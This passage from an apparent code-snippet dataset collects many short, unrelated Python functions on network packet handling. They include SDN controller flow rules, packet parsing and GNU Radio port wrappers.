str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def act_like_hub (self, packet, packet_in):\n # We want to output to all ports -- we do that using the special\n # OFPP_ALL port as the output port. 
(We could have also used\n # OFPP_FLOOD.)\n self.resend_packet(packet_in, of.OFPP_ALL)\n\n # Note that if we didn't get arp_req valid buffer_id, arp_req slightly better\n # implementation would check that we got the full data before\n # sending it (len(packet_in.data) should be == packet_in.total_len)).", "def _handle_PacketIn (self, event):\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n \n self.do_firewall(packet, packet_in, event)", "def message_ports_in(self) -> \"pmt::pmt_t\":\n return _beamforming_swig.phasedarray_sptr_message_ports_in(self)", "def outReceived(self, data):\n if data[0:4] == \"port\":\n port = data.split(':')[1]\n self.deferred.callback(port)", "def FlowStatInPort(self):\n\t\treturn self._get_attribute('flowStatInPort')", "def in_aux_port(self, port):\n port = ct.c_int(port)\n state = ct.c_int()\n self.lib.InAuxPort(port, ct.pointer(state))\n return state.value", "def message_ports_in(self):\n return _spacegrant_swig.ax25_pdu_packer_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.ax25_udp_pdu_gen_sptr_message_ports_in(self)", "def _handle_PacketIn(self, event):\n msg = of.ofp_packet_out()\n msg.data = event.ofp\n msg.in_port = event.port\n msg.actions.append(of.ofp_action_output(port=of.OFPP_FLOOD))\n event.connection.send(msg)", "def out_aux_port(self, port):\n return self.auxout[port - 1]", "def message_ports_in(self):\n return _spacegrant_swig.G3RUH_descramble_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _uhd_swig.usrp_sink_sptr_message_ports_in(self)", "def port_out(self) -> int:\n return self.proto.port_out", "def out_data(self, port: int) -> Optional[Any]:\n try:\n return copy(self.outputs[port])\n except:\n return None", "def message_ports_in(self):\n return _spacegrant_swig.ax25_udp_pdu_receiver_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.NRZI_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.binary_sink_sptr_message_ports_in(self)", "def _packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n ofproto = msg.datapath.ofproto\n dpid = datapath.id\n switch = self.switches[dpid]\n in_port = msg.match['in_port']\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocol(ethernet.ethernet)\n #*** TBD, deal with context:\n context = self.context_default\n\n #*** Extra debug if syslog or console logging set to DEBUG:\n if self.debug_on:\n self._packet_in_debug(ev, in_port)\n\n #*** Is it a DPAE Join request? 
If so, call function to handle it:\n if eth.src == self.ctrl2dpae_mac and eth.dst == self.dpae2ctrl_mac:\n self.dpae_join(pkt, datapath, in_port)\n return 1\n\n self.logger.info(\"Learned mac=%s dpid=%s port=%s\",\n eth.src, dpid, in_port)\n\n #*** Add to MAC/port pair to switch MAC table:\n switch.mactable.add(eth.src, in_port, context)\n\n #*** In active mode with a DPAE, we need to add an AMF flow entry:\n if self.main_policy.tc_policies.mode == 'active':\n #*** Look the DPID up in the database:\n db_result = self.dbdpae.find_one({'dpid': dpid})\n if db_result:\n self.logger.info(\"Found DPAE for dpid=%s, adding AMF entry\",\n dpid)\n #*** Get the dpae port for that switch:\n #*** TBD, handle more than one DPAE per switch\n dpae_port = db_result['switch_port']\n if dpae_port:\n #*** Add FE to the Active Mode Filter (ft_amf) Flow table:\n self.logger.info(\"Adding AMF entry dpid=%s dpae_port=%s \"\n \"mac=%s\", dpid, dpae_port, eth.src)\n switch.flowtables.add_fe_amf_macport_dst(dpae_port,\n eth.src)\n else:\n self.logger.error(\"No DPAE switch port for dpid=%s\", dpid)\n else:\n self.logger.debug(\"No DPAE found for dpid=%s\", dpid)\n\n #*** Add source MAC / in port to Forwarding table as destinations so\n #*** that we don't flood them:\n switch.flowtables.add_fe_fwd_macport_dst(in_port, eth.src)\n\n #*** Add source MAC / in port to Identity Indicator (MAC) table so\n #*** that we don't get further packet in events for this combo:\n switch.flowtables.add_fe_iim_macport_src(in_port, eth.src)\n\n #*** Do a packet out to avoid going through DPAE in active mode\n #*** which causes bad MAC learning in adjacent switches\n #*** if forwarding entry not installed:\n\n # Send out specific port if known or flood:\n out_port = switch.mactable.mac2port(eth.dst, context)\n if out_port == switch_abstraction.PORT_NOT_FOUND:\n out_port = ofproto.OFPP_FLOOD\n\n #*** Packet out:\n switch.packet_out(msg.data, in_port, out_port, 0, 1)", "def message_ports_in(self):\n return _uhd_swig.usrp_source_sptr_message_ports_in(self)", "def testGetIngressPort(self):\n self.oxc.get_ingress(file_name = 'get_ingress_port.xml')", "def message_ports_in(self) -> \"pmt::pmt_t\":\n return _beamforming_swig.doaesprit_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.ax25_pdu_unpacker_sptr_message_ports_in(self)", "def dataInfo(self, out):\n addr = -1\n i = 0\n while i <= 65536:\n # data\n if (i == 65536 or self.ihxData[i] < 0) and addr >= 0:\n print i - addr + \" Bytes from \" + Integer.toHexString(addr) + \" to \" + Integer.toHexString(i - 1)\n addr = -1\n if i < 65536 and self.ihxData[i] >= 0 and addr < 0:\n addr = i\n i += 1", "def message_ports_in(self):\n return _spacegrant_swig.udp_debug_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.DeNRZI_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.invert_bit_sptr_message_ports_in(self)", "def _handle_PacketIn(self, event):\n\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n\n # Comment out the following line and uncomment the one after\n # when starting the exercise.\n # self.act_like_hub(packet, packet_in)\n # self.act_like_switch(packet, packet_in)\n self.act_like_router(packet, packet_in)", "def testGetConfigIngressPorts(self):\n self.oxc.getconfig_ingress_ports(file_name = 'getconfig_ingress_ports.xml', ingress_ports = 
oxcDict['valid_ingress_ports'])", "def message_ports_in(self):\n return _TestA_swig.my_qpsk_demod_cb_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.hdlc_framer_sptr_message_ports_in(self)", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n logger.info('INT Packet data - [%s]', extract_int_data(packet[Ether]))\n return False", "def connect_icache(self, port: Port) -> None:\n self.port_end.req_ports = port", "def _handle_PacketIn(self, event):\r\n\r\n packet = event.parsed # This is the parsed packet data.\r\n if not packet.parsed:\r\n log.warning(\"Ignoring incomplete packet\")\r\n return\r\n\r\n packet_in = event.ofp # The actual ofp_packet_in message.\r\n\r\n # Comment out the following line and uncomment the one after\r\n # when starting the exercise.\r\n #self.act_like_hub(packet, packet_in)\r\n self.act_like_switch(packet, packet_in)\r\n #self.act_like_router(packet, packet_in)\r", "def send_packet_out(dp, pkt, out_port, in_port=ofp.OFPP_CONTROLLER):\n actions = [parser.OFPActionOutput(out_port)]\n msg = parser.OFPPacketOut(datapath=dp,\n buffer_id=ofp.OFP_NO_BUFFER,\n in_port=in_port,\n actions=actions,\n data=pkt)\n return msg", "def testGetConfigIngressPort(self):\n self.oxc.getconfig_ingress(file_name = 'getconfig_ingress_port.xml')", "def _handle_ConnectionIn (self, event, flow, packet):\n log.debug(\"Allowed connection [\" + str(flow.src) + \":\" + str(flow.srcport) + \",\" + str(flow.dst) + \":\" + str(flow.dstport) + \"]\" )\n event.action.forward = True", "def message_ports_in(self) -> \"pmt::pmt_t\":\n return _beamforming_swig.beamformer_sptr_message_ports_in(self)", "def get_input_data_value(node: Node, port: int):\n return node.in_port(port).data.get_value()", "def WriteToPipeIn(self, epAddr, data): \n return self._server.write_to_pipe_in(self._serial, epAddr, list(data))", "def inb():", "def _parse_packet(packet: StreamMessageResponse) -> Packet:\n if packet is None:\n raise TypeError(\"Packet cannot be None!\")\n\n packet = MessageToDict(packet)\n\n # Decoding Header\n ingress_port_base64 = packet['packet']['metadata'][0]['value'].encode()\n ingress_port = base64.decodebytes(ingress_port_base64) # retrieving ingress_port; not used, yet\n\n # Decoding Payload\n packet = _scapy_parse(packet)\n\n return packet", "def read_in_buf(self):\n\t\treturn self._server_in_buf", "def message_ports_in(self):\n return _spacegrant_swig.general_burster_2_sptr_message_ports_in(self)", "def _handle_DeferredConnectionIn (self, event, flow, packet):\n pass", "def get_incoming_port(self):\n\t\treturn call_sdk_function('PrlPortFwd_GetIncomingPort', self.handle)", "def message_ports_in(self):\n return _spacegrant_swig.message_debug_sptr_message_ports_in(self)", "def dummy_transmit_handler(out_port, packet):\n pass", "def OnESPacket(current_pid, packet, header_size):\n pass", "def message_ports_in(self) -> \"pmt::pmt_t\":\n return _beamforming_swig.randomsampler_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _add_vector_swig.add_vector_2_cpp_sptr_message_ports_in(self)", "def parse_fifo_data(data: bytearray) -> None:\n return int.from_bytes(data, byteorder='little', signed=True)", "def add_fe_iim_macport_src(self, in_port, eth_src):\n ofproto = self.datapath.ofproto\n parser = self.datapath.ofproto_parser\n #*** Priority needs to be greater than 0:\n priority = 1\n match = parser.OFPMatch(in_port=in_port, eth_src=eth_src)\n actions = []\n inst = [parser.OFPInstructionActions(\n ofproto.OFPIT_APPLY_ACTIONS, actions),\n 
parser.OFPInstructionGotoTable(self.ft_iim + 1)]\n mod = parser.OFPFlowMod(datapath=self.datapath, table_id=self.ft_iim,\n priority=priority,\n idle_timeout=self.mac_iim_idle_timeout,\n flags=ofproto.OFPFF_SEND_FLOW_REM,\n match=match,\n instructions=inst)\n self.datapath.send_msg(mod)", "def _get_data(self):\n raw_data = self._get_raw_data()\n if not raw_data:\n return None\n result = {}\n for line in raw_data:\n if 'tcp' in line:\n parts = line.split()\n proto = parts[0]\n local_addr = parts[3]\n state = parts[5]\n ip, port = local_addr.rsplit(':', 1)\n port = str(port)\n result[port] = 1\n if state == 'LISTEN':\n if port not in self.charts['ports']:\n self.charts['ports'].add_dimension([port, port, 'absolute'])\n return result", "def read_in_buf(self):\n return self._server_in_buf", "def __packet_stuff(self, data):\n stuffed = bytearray()\n stuffed.append(0x7e)\n for count in data:\n if count >= 0x7d and count <= 0x7f:\n stuffed.append(0x7d)\n stuffed.append(count - 0x7d)\n else:\n stuffed.append(count)\n stuffed.append(0x7f)\n return(stuffed)", "def get_tcp_packet_payload(pkt: dpkt.ethernet.Ethernet) -> bytes:\n eth = dpkt.ethernet.Ethernet(pkt)\n if isinstance(eth.data, dpkt.ip.IP) and isinstance(eth.data.data, dpkt.tcp.TCP):\n return eth.data.data.data", "def callback(self, packet):\n\n\t\tsrc = packet[IP].src\n\t\tdst = packet[IP].dst\n\n\t\tif TCP in packet:\n\t\t\tsrc_port = packet[TCP].sport\n\t\t\tdst_port = packet[TCP].dport\n\t\telif UDP in packet:\n\t\t\tsrc_port = packet[UDP].sport\n\t\t\tdst_port = packet[UDP].dport\n\t\telse:\n\t\t\tsrc_port = \"other\"\n\t\t\tdst_port = \"other\"\n\n\t\tdata = src + \":\" + str(src_port) + \"-\" + dst + \":\" + str(dst_port)\n\t\tdata = self.padding(data)\n\t\tsock.send(data.encode())", "def __udp_preprocess_packet(self, seq):\n return b'06' + seq.to_bytes(4, 'big') \\\n + self.packets_status[seq][\"size\"].to_bytes(2, 'big') \\\n + self.packets_status[seq][\"payload\"]", "def packet_read(self):\n bytes_received = 0\n \n if self.sock == NC.INVALID_SOCKET:\n return NC.ERR_NO_CONN\n \n if self.in_packet.command == 0:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, 1)\n if errnum == 0 and len(ba_data) == 1:\n bytes_received += 1\n byte = ba_data[0]\n self.in_packet.command = byte\n \n if self.as_broker:\n if self.bridge is None and self.state == NC.CS_NEW and (byte & 0xF0) != NC.CMD_CONNECT:\n print \"RETURN ERR_PROTOCOL\"\n return NC.ERR_PROTOCOL, bytes_received\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n \n if not self.in_packet.have_remaining:\n loop_flag = True\n while loop_flag:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, 1)\n \n if errnum == 0 and len(ba_data) == 1: \n byte = ba_data[0]\n bytes_received += 1\n self.in_packet.remaining_count += 1\n if self.in_packet.remaining_count > 4:\n return NC.ERR_PROTOCOL, bytes_received\n \n self.in_packet.remaining_length += (byte & 127) * self.in_packet.remaining_mult\n self.in_packet.remaining_mult *= 128\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n 
self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n \n if (byte & 128) == 0:\n loop_flag = False\n \n if self.in_packet.remaining_length > 0:\n self.in_packet.payload = bytearray(self.in_packet.remaining_length)\n if self.in_packet.payload is None:\n return NC.ERR_NO_MEM, bytes_received\n self.in_packet.to_process = self.in_packet.remaining_length\n \n self.in_packet.have_remaining = True\n \n if self.in_packet.to_process > 0:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, self.in_packet.to_process)\n if errnum == 0 and len(ba_data) > 0:\n readlen = len(ba_data)\n bytes_received += readlen\n for idx in xrange(0, readlen):\n self.in_packet.payload[self.in_packet.pos] = ba_data[idx]\n self.in_packet.pos += 1\n self.in_packet.to_process -= 1\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n\n #all data for this packet is read\n self.in_packet.pos = 0\n \n ret = self.packet_handle()\n \n self.in_packet.packet_cleanup()\n \n self.last_msg_in = time.time()\n \n return ret, bytes_received", "def _handle_PacketIn(self, event):\n\n packet = event.parsed # Packet is the original L2 packet sent by the switch\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n # ignore lldp packets\n if event.parsed.type == ethernet.LLDP_TYPE:\n return\n # act like switch\n packet_in = event.ofp # packet_in is the OpenFlow packet sent by the switch\n self.act_like_switch(packet, packet_in)", "def send_traffic_data(serialport, pack):\n pack[0] = 0x01\n pack[1] = 0x00\n serialport.write(pack)\n logging.debug(\"Traffic Data - Sent.\")\n logging.debug(str(pack))", "def message_ports_in(self):\n return _TestA_swig.cleanslate_sptr_message_ports_in(self)", "def _icmp_send(dp, port_out, ip_src=DISCOVERY_IP_SRC, ip_dst=DISCOVERY_IP_DST,\n eth_src='02:b0:00:00:00:b5', eth_dst='02:bb:bb:bb:bb:bb',\n icmp_type=8, icmp_code=0):\n\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n pkt = packet.Packet()\n pkt.add_protocol(ethernet.ethernet(ethertype=0x0800,\n dst=eth_dst,\n src=eth_src))\n\n pkt.add_protocol(ipv4.ipv4(dst=ip_dst,\n src=ip_src,\n proto=1))\n\n ##Latency measurement\n my_clock = str(time.clock())\n\n ##TODO: Rework payload and codes to properly work with Fragmentation needed\n pkt.add_protocol(icmp.icmp(type_=icmp_type,\n code=icmp_code,\n csum=0,\n data=icmp.echo(1,1,\"{'dpid' : \"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\")))\n pkt.serialize()\n data=pkt.data\n actions=[parser.OFPActionOutput(port_out,0)]\n out=parser.OFPPacketOut(datapath=dp, buffer_id=ofp.OFP_NO_BUFFER, in_port=ofp.OFPP_CONTROLLER, actions=actions, data=data)\n ##LOG.debug('***ICMP DEBUG*** Sending ICMP with Payload: ' + \"{'dpid' : \"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\" )\n dp.send_msg(out)", "def handle_in_bound(self, convo, packet):\n\n convo['in_pkts'].append(packet)\n\n # Latency between tap and client\n if packet['tcp']['flags']['ACK']: \n if convo['syn_ack_num'] == (packet['tcp']['ack_num'] - 1):\n convo['latency'] = packet['ts'] - convo['syn_ack_ts']\n\n # Check if FIN by client\n if packet['tcp']['flags']['FIN']:\n convo['client_fin'] = packet['ts']\n\n if convo.get('server_fin') is not None:\n # Expire conversation\n convo['end_pos'] = 
packet['pos']\n try:\n self.reconstruct(convo)\n self.store(convo)\n finally:\n # Make sure stuff gets deleted no matter what\n del self.conv[convo['source_key']]\n del convo\n\n # Check for RST by client\n if packet['tcp']['flags']['RST']:\n convo['client_rst'] = True\n convo['end_pos'] = packet['pos']\n try:\n self.reconstruct(convo)\n self.store(convo)\n finally:\n # Make sure stuff gets deleted no matter what\n del self.conv[convo['source_key']]\n del convo", "def _backend_port_to_port(self, backend_port):\n return models.Port(\n backend_id=backend_port['nic'],\n name=backend_port['label'],\n # MAC address is optional\n mac_address=backend_port.get('mac_address'),\n state=models.Port.States.OK,\n runtime_state=backend_port['state'],\n )", "def get_ip_port_tshark(str_data):\n separator = str_data.rindex(\":\")\n ip = str_data[:separator]\n port = str_data[separator + 1:]\n return ip, port", "def Port(self) -> int:", "def _build_packet_out(self, datapath, buffer_id, src_port, dst_port, data):\r\n actions = []\r\n if dst_port:\r\n actions.append(datapath.ofproto_parser.OFPActionOutput(dst_port))\r\n\r\n msg_data = None\r\n if buffer_id == datapath.ofproto.OFP_NO_BUFFER:\r\n if data is None:\r\n return None\r\n msg_data = data\r\n\r\n out = datapath.ofproto_parser.OFPPacketOut(\r\n datapath=datapath, buffer_id=buffer_id,\r\n data=msg_data, in_port=src_port, actions=actions)\r\n return out", "def _send_packet_out(self, packet: Packet, port) -> None:\n try:\n p = self.shell.PacketOut(bytes(packet), egress_port=str(port))\n p.send()\n logging.debug(\"Sending packet out: egress_port {}\".format(port))\n except UserError as e:\n logging.debug(e)\n return", "def __init__(self, packet: Dict[str, Any]) -> None:\n self.source_address = packet['ip_header']['source_address']\n self.source_port = packet['tcp_header']['source_port']\n self.destination_address = packet['ip_header']['destination_address']\n self.destination_port = packet['tcp_header']['destination_port']\n\n self.packets = [(TCPStream.INBOUND, packet)]", "def process(self, parsed_packet):\n byte_buf = parsed_packet.serialize()\n out_port= parsed_packet.get_field(\"intrinsic_metadata.egress_port\")\n logging.debug(\"Transmit pkt id %d to %d\" % (parsed_packet.id, out_port))\n buf = bytearray(byte_buf)\n for idx in range((len(buf) + 19)/20):\n logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20))\n\n self.transmit_handler(out_port, byte_buf)", "def packet_out(self, data, in_port, out_port, out_queue, nq=0):\n ofproto = self.datapath.ofproto\n parser = self.datapath.ofproto_parser\n dpid = self.datapath.id\n #*** First build OF version specific list of actions:\n if nq:\n #*** Packet out with no queue (nq):\n actions = [self.datapath.ofproto_parser.OFPActionOutput \\\n (out_port, 0)]\n\n else:\n #*** Note: out_port must come last!\n actions = [\n parser.OFPActionSetQueue(out_queue),\n parser.OFPActionOutput(out_port, 0)]\n\n #*** Now have we have actions, build the packet out message:\n out = parser.OFPPacketOut(\n datapath=self.datapath, buffer_id=ofproto.OFP_NO_BUFFER,\n in_port=in_port, actions=actions, data=data)\n\n self.logger.debug(\"Sending Packet-Out message dpid=%s port=%s\",\n dpid, out_port)\n #*** Tell the switch to send the packet:\n self.datapath.send_msg(out)", "def read_interrupt_capture(self, port):\n value = 0\n if port == 0:\n value = self.__bus.read_byte_data(self.__ioaddress, self.INTCAPA)\n else:\n value = self.__bus.read_byte_data(self.__ioaddress, self.INTCAPB)\n return value", "def protocol_in(self, protocol_in):\n\n 
self._protocol_in = protocol_in", "def parse_packet(data):\n ip = IPPacket(data)\n icmp = ICMPPacket(ip.payload)\n print('ICMP message from %s, type %d (%s), code %d, %d byte payload.') % (\n ip.src_addr, icmp.type, ICMP_TYPES[icmp.type], icmp.code,\n len(icmp.payload))\n return len(icmp.payload)", "def read_packetlen(self):\n packetlen = int(struct.unpack('!I', b\"\".join(self.__input))[0])\n self.__input = []\n self.set_terminator(packetlen)\n self.found_terminator = self.read_milter_data", "def RequestData(self, request, inInfo, outInfo):\n # Inputs from different ports:\n pdi0 = self.GetInputData(inInfo, 0, 0)\n pdi1 = self.GetInputData(inInfo, 1, 0)\n pdo = self.GetOutputData(outInfo, 0)\n\n pdo.DeepCopy(pdi0)\n\n # Get number of rows\n nrows = pdi0.GetNumberOfRows()\n nrows1 = pdi1.GetNumberOfRows()\n assert(nrows == nrows1)\n\n for i in range(pdi1.GetRowData().GetNumberOfArrays()):\n arr = pdi1.GetRowData().GetArray(i)\n pdo.GetRowData().AddArray(arr)\n return 1", "def message_ports_in(self):\n return _spacegrant_swig.hdlc_deframer_sptr_message_ports_in(self)", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n return", "def get_input_shape(node: Node, in_port: int):\n if in_port not in node.in_ports():\n raise Exception('Can\\'t get shape for {} port of {} node. No such port in node'.format(in_port, node.name))\n in_port = node.in_port(in_port)\n return in_port.data.get_shape()", "def handle_udp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n length = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(length)\r\n packets[i][2].append(checksum_value)\r\n\r\n return packets", "def encode_packet(self, packet):\n\n\t\ttry:\n\t\t\toutput = self.pack('ubyte', packet.ident)\n\t\t\tappend = ''\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tfor i in ('x2','y2','z2'):\n\t\t\t\t\t\tappend += self.pack('short', packet.data[i])\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data_size'] = len(packet.data['data'])\n\t\t\t\tappend += self.pack_array_fast('byte', packet.data['data'])\n\t\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = []\n#\t\t\t\tbtypes = []\n#\t\t\t\tmetadata = []\n#\t\t\t\tfor i in packet.data['blocks']:\n#\t\t\t\t\tcoords.append(i['x'] << 12 | i['z'] << 8 | i['y'])\n#\t\t\t\t\tbtypes.append(i['type'])\n#\t\t\t\t\tmetadata.append(i['metadata'])\n#\t\t\t\t\n#\t\t\t\tpacket.data['data_size'] = len(coords)\n#\t\t\t\tappend += self.pack_array_fast('short', coords)\n#\t\t\t\tappend += self.pack_array_fast('byte', btypes)\n#\t\t\t\tappend += self.pack_array_fast('byte', metadata)\n\t\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\tarray = []\n\t\t\t\tfor i in packet.data['blocks']:\n\t\t\t\t\tarray += [i['x'], i['y'], i['z']]\n\t\t\t\tpacket.data['data_size'] = len(packet.data['blocks'])\n\t\t\t\tappend += self.pack_array_fast('byte', array)\n\t\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data['data_size'] = len(packet.data['slots_data'])\n\t\t\t\tappend += self.pack_array('slot', packet.data['slots_data'])\n\t\t\t#0x82: Sign\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"line_%s\" % (i+1)] = 
packet.data[\"text\"][i]\n\t\t\t#0x83\n\t\t\tif packet.ident == 0x83:\n\t\t\t\tpacket.data['data_size'] = len(packet.data['data'])\n\t\t\t\tappend += self.pack_array_fast('byte', packet.data['data'])\n\t\t\n\t\t\tfor i in self.get_struct(packet):\n\t\t\t\toutput += self.pack(i[0], packet.data[i[1]])\n\t\t\t\n\t\t\toutput += append\n\t\t\treturn output\n\t\texcept Exception:\n\t\t\traise", "def trafficInboundPorts(self):\n #\n # TODO: Reimplement this if possible\n #\n return client.trafficInboundPorts(self)", "def _validate_ens_net_portsecurity(self, net_data):\n pass", "def port_not_in(self, port_not_in):\n\n self._port_not_in = port_not_in", "def port_not_in(self, port_not_in):\n\n self._port_not_in = port_not_in", "def preprocess(self, data):\n (w,h,f) = self.rawinputformat()\n dt = numpy.dtype(numpy.uint8)\n nb = numpy.frombuffer(data,dt,-1,0)\n actual_stream_width = (w&1)+w # hack, rather get this from the app sink\n if(actual_stream_width != self.reqsize):\n nb = nb.reshape(h,actual_stream_width,3)\n nb = nb[0:h,0:w,0:3] # crop to network input size\n else:\n nb = nb.reshape((actual_stream_width,actual_stream_width,3))\n img = nb.astype('float32')\n #Preprocess image\n #for i in range(3):\n # img[:,:,i] = (img[:,:,i] - self.mean[i]) * self.std[i]\n #img = resize(img/255.0,(w,h),1)\n img = img/255.0\n print(img.shape)\n #print(img[0,0,:])\n return img.astype(numpy.float16)", "def _get_nport(self):\n return self.__nport", "def PacketFromReceiver(self, packet):\n # TODO: Implement TCP here.\n pass", "def ingress_config(self) -> Optional[pulumi.Input['IngressConfigArgs']]:\n return pulumi.get(self, \"ingress_config\")", "def data_received(self, data):\n for byte in serial.iterbytes(data):\n if self.in_data and (len(self.packet) < self.data_size):\n self.packet.extend(byte)\n if len(self.packet) == self.data_size:\n self.in_data = False\n # make read-only copy\n self.handle_packet(bytes(self.packet))\n del self.packet[:]\n # Since there is no 'byte' object, indexing a bytes or bytearray\n # object yields an int. Instead, we need to compare a bytes object\n # of size 1 with a bytes object of size 1\n elif byte == self.HEADER[self.header_pos:self.header_pos+1]:\n self.header_pos += 1\n if self.header_pos == len(self.HEADER):\n self.header_pos = 0\n self.in_data = True\n else:\n self.header_pos = 0", "def decode(self,buf):\n eth = dpkt.ethernet.Ethernet(buf)\n pkt_len = len(buf)\n if(eth.type== dpkt.ethernet.ETH_TYPE_IP):\n ip = eth.data\n dst_ip = socket.inet_ntoa(ip.dst)\n src_ip = socket.inet_ntoa(ip.src)\n octet_list = string.split(dst_ip,'.')\n broadcast = False\n for o in octet_list:\n if (o == \"255\"):\n broadcast = True\n break\n if((octet_list[0] == \"224\") or (octet_list[0] == \"239\")):\n broadcast = True #Its multicast actually.\n if not broadcast:\n if(ip.p == dpkt.ip.IP_PROTO_TCP):\n pass\n elif(ip.p == dpkt.ip.IP_PROTO_UDP):\n udp =ip.data\n if((udp.dport == 53) or (udp.sport == 53)): # A request. \n if(udp.dport == 53): # A request. \n return self.dns_handler.handle_dns_request(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n if(udp.sport == 53): # A DNS response\n self.dns_handler.handle_dns_response(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n else:\n pass" ]
